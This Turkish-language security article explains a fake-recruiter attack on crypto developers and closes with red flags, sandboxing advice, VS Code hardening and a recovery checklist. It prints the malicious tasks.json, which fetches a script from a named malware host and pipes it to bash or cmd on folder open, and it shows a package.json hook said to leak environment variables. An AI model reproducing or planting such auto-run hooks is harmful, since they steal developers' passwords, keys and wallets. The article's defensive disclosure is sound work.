Bulaşıcı Mülakat: Sahte İşe Alımcılar Geliştiricileri Nasıl Hackliyor?
Özet: Devlet destekli yeni bir saldırı dalgası, kripto dünyasındaki en iyi geliştiricileri vuruyor. Dolandırıcılar, işe alımcı veya CTO kılığına giriyor ve adayları kötü amaçlı kod açmaya zorluyor. Bu makale "Martin Erazo" vakasını, VS Code "tasks.json" açığını ve hayatta kalmak için gereken "Yakma Protokolünü" (Burn Protocol) analiz ediyor.
Sorumluluk Reddi: Bu makale, gerçek kişilerin taklit edildiği siber güvenlik olaylarını bildirmektedir. "Martin Erazo" ve "Ara Vartanian" isimleri saldırganlar tarafından kullanılan kimliklerdir. Bu isimlere sahip gerçek kişilerin kimlik hırsızlığı kurbanı olduğuna ve kötü niyetli faaliyetlerle hiçbir ilgisi olmadığına inanıyoruz.
1. Mükemmel Kurban: "Martin Erazo" Kimliği
Kıdemli bir Dev için her şeyi doğru yapan bir mesajla başlar:
- Rol: CTO / Baş Mimar
- Bütçe: 6 Milyon $ fon sağlandı
- Teknoloji: Web3, AI, Merkeziyetsiz Altyapı
Yakın zamanda doğrulanan bir saldırıda, "Martin Erazo" adlı bir işe alımcı LinkedIn üzerinden iletişime geçti. Profil gerçek bir tiyatro yönetmeninin adını ve fotoğrafını kullanıyordu, ancak iş geçmişi sahteydi ve 2025'te aniden "IT Proje Yönetimi"ne dönüşmüştü - bu, hacklenmiş veya satın alınmış bir hesabın klasik işaretidir.
Dolandırıcılık hızlı ilerler. Standart İK taramasını atlarlar ve hemen üst düzey bir yöneticiyle "Teknik Mülakat"a geçerler - bu durumda, sektördeki gerçek bir CTO olan Ara Vartanian'ın (Limit Break'te) taklidi yapıldı.
Kırmızı Bayrak: Proje isimleri sürekli değişir. İşe alımcı **"Betfin"**i (bir GameFi platformu) satar, ancak gönderilen sunum "SpaceXView" (bir Metaverse projesi) içindir. Bu tutarsızlık, dolandırıcıların varlıkları farklı kampanyalar arasında yeniden kullandığının bir ipucudur.
2. Tuzak: "MVP Kodumuzu İnceleyebilir misin?"
Sahte "CTO", MVP (Minimum Uygulanabilir Ürün) kodunu incelemek için uzman görüşünüze ihtiyaç duyduğunu iddia eder. Size bir GitHub deposu linki veya ZIP dosyası gönderirler ve mülakat sırasında veya hemen sonrasında açmanız için baskı yaparlar.
Saldırının gerçekleştiği an burasıdır.
Yardım etme isteğinizi ve egonuzu kullanırlar. Bir React bileşeninde hata (bug) aradığınızı sanırsınız. Gerçekte, "bug", birikimlerinizi çalmak için tasarlanmış bir "özelliktir".
3. Teknik Sızma: Zero-Click Malware
Saldırganlar, geliştirici araçlarını hedef alan "sıfır tık" veya "az tık" açıklarını kullanır. Uygulamayı çalıştırmanıza bile gerek yoktur; sadece klasörü açmanız yeterlidir.
Suç Aleti: .vscode/tasks.json
Bu özel durumda, Repo'da bir bubi tuzağı olan .vscode/tasks.json dosyası vardı. Bu dosya VS Code'a projeyi nasıl derleyeceğini söyler.
Kötü Amaçlı Kod:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Bu tetikleyicidir. Klasörü VS Code'da açtığınız anda, bu görev otomatik olarak çalışır.
- Payload: curl kullanarak
vscodesettingtask.vercel.appadresinden bir komut dosyası indirir - bu, ayar API'si kılığına girmiş bilinen bir kötü amaçlı yazılım sunucusudur. - Sonuç: Komut dosyası bellekte çalışır ve Chrome şifrelerini, oturum çerezlerini ve SSH anahtarlarını anında çalar.
B Planı: package.json scripts
VS Code saldırısı başarısız olursa, npm komut dosyaları vardır:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
npm install veya npm start komutlarını çalıştırmak server/server.js dosyasını tetikler - bu da Ortam Değişkenlerinizi (AWS anahtarları, Cüzdan seed'leri) saldırgana sızdıran yerel bir C2 (Komuta Kontrol) betiğidir.
4. Kırmızı Bayraklar vs Yeşil Bayraklar
Çok geç olmadan nasıl fark edersiniz?
Bir geliştiriciyseniz, "Özel Repo" (Private Repo) veya ZIP dosyaları en yüksek alarm seviyesini tetiklemelidir. Meşru şirketler Public Repo veya standart platformlar üzerinden test görevleri kullanır.
Uyarı: Geliştiricilere saldırmanın tek yolu bu değildir. İşbirlikçi Tuzağı ile Discord'daki tehlikeleri ve Tedarik Zinciri Saldırıları ile bağımlılıkların nasıl güvensiz hale geldiğini okuyun.
| 🚩 Kırmızı Bayrak (Kaç) | ✅ Yeşil Bayrak (Güvenli) |
|---|---|
| Önce Kod: İş teklifi yapmadan önce kod gönderirler | Standart Süreç: Önce mülakat, sonra kod |
| Bozuk Kimlik: İşe alımcının geçmişi alakasızdır (örn. Sanatçı -> IT Müdürü) | Doğrulanmış Geçmiş: LinkedIn kariyer yolu tutarlıdır |
| Uyuşmazlık: Proje isimleri tutmaz (Betfin vs SpaceXView) | Tutarlılık: İsim, belgeler ve web sitesi eşleşir |
| Aciliyet: "CTO bekliyor", "şimdi aç" | Sabır: Zamanınıza ve programınıza saygı duyarlar |
| Kişisel E-posta: [email protected] | Şirket E-postası: [email protected] (geçerli MX kayıtları olan) |
5. Güvenlik Protokolü: Güvenli Mülakat Nasıl Yapılır?
Eğer Kıdemli bir Geliştiriciyseniz, av olacaksınız. Ortamınızı güçlendirmek zorunludur.
Protokol 1: "Burner" Ortamı (Kullan-At)
Kod testleri için ASLA ana iş istasyonunuzu kullanmayın.
- Sanal Makineler: VirtualBox veya VMWare kullanın.
- Bulut Geliştirme Ortamları: GitHub Codespaces veya Gitpod kullanın. Bunlar kısa ömürlüdür ve yerel cüzdan dosyalarınızdan izoledir.
Protokol 2: Adli Denetim (Forensic Audit)
Tanıdık olmayan kodu açmadan önce:
- .vscode/tasks.json'ı kontrol edin:
runOn: folderOpenarayın. - package.json'ı kontrol edin: Şüpheli preinstall veya postinstall betikleri arayın.
- Anahtar Kelime Araması:
curl,wget,os.homedir(),.ssh,walletiçin grep yapın.
Protokol 3: VS Code Sertleştirme
Global olarak "Workspace Trust"ı devre dışı bırakın.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Bu, VS Code'u herhangi bir klasör düzeyindeki görevi çalıştırmadan önce izin istemeye zorlar.
6. Çözüm: "Yakma Protokolü" (Burn Protocol)
Eğer kötü amaçlı bir Repo açtıysanız (örneğin "Martin Erazo" karakterinin gönderdiği), hacklendiğinizi varsayın. Geri alma (Rollback) yeterli değildir.
- Bağlantıyı Kesin: Ethernet kablosunu hemen çekin.
- Cüzdanları Yakın: Özel Anahtarlarınız sızdırıldı. Temiz bir cihazda (telefon) yeni cüzdanlar oluşturun ve kalan fonları aktarın. Eski seed'i bir daha asla kullanmayın.
- Oturumları Sonlandırın: Google, GitHub, AWS'deki tüm oturumları kapatın. Aktif oturumları iptal edin.
- SSH Anahtarlarını Denetleyin: GitHub/GitLab ayarlarını kontrol edin. Saldırganlar genellikle arka kapı erişimini korumak için kendi SSH anahtarlarını eklerler. Tanımadıklarınızı silin.
- Sıfırlayın (Nuke It): Diski silin ve işletim sistemini yeniden kurun. Rootkit'lerin gittiğinden %100 emin olmanın tek yolu budur.
Sonuç
"Bulaşıcı Mülakat" dolandırıcılığı, kendi uzmanlığınızı size karşı silah olarak kullanır. Sorun çözme arzunuzu hedef alır. Ancak Web3'te paranoya profesyonel bir erdemdir. Her kimliği doğrulayın, her depoyu sanal alanda (sandbox) çalıştırın ve kod çalıştırmanız için acele eden "işe alımcılara" asla güvenmeyin.
İlgili Makaleler
Tedarik Zinciri Zehri (Supply Chain Poison): Güvenilir Güncellemeler Ne Zaman Malware Olur?
Tuhaf bir şey indirmediniz. Sadece Ledger uygulamasını güncellediniz... Ve paranın kaybolduğu an o andı. Tedarik Zinciri Saldırısının dehşeti.
Kağıt Kalkan (The Paper Shield): Seed Phrase Nasıl Doğru Yedeklenir?
Ekran görüntüleri felakettir. Bulut, başkasının bilgisayarıdır. Özel anahtarlarınızı saklamanın tek güvenli yolu 'Çelik' ve 'Kağıt'tır.
Uzun Oyun (The Long Con): 'Domuz Kasaplığı' Dolandırıcılıklarının Psikolojisi
Yanlış numaraya mesaj atmadı. Ve sana aşık değil. Kriptodaki en acımasız dolandırıcılık olan 'Sha Zhu Pan'ı ve senaryoyu nasıl fark edeceğinizi öğrenin.